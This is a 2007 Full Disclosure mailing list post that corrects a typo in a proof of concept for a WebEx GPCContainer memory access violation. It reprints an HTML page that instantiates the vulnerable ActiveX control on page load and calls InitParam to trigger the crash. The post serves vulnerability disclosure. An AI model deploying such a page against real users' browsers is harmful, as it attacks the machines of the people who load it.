Full Disclosure mailing list archives

Re: WebEx GPCContainer Memory Access Violation


From: Elazar Broad <elazarb () earthlink net>
Date: Tue, 13 Nov 2007 21:09:33 -0500 (GMT-05:00)

Typo in the original PoC. It should read as follows:

---------------------
<!--
Written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
        var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
    
        obj.InitParam("A");
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();">
  
 </body>

</html>
--------------------- 

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Current thread: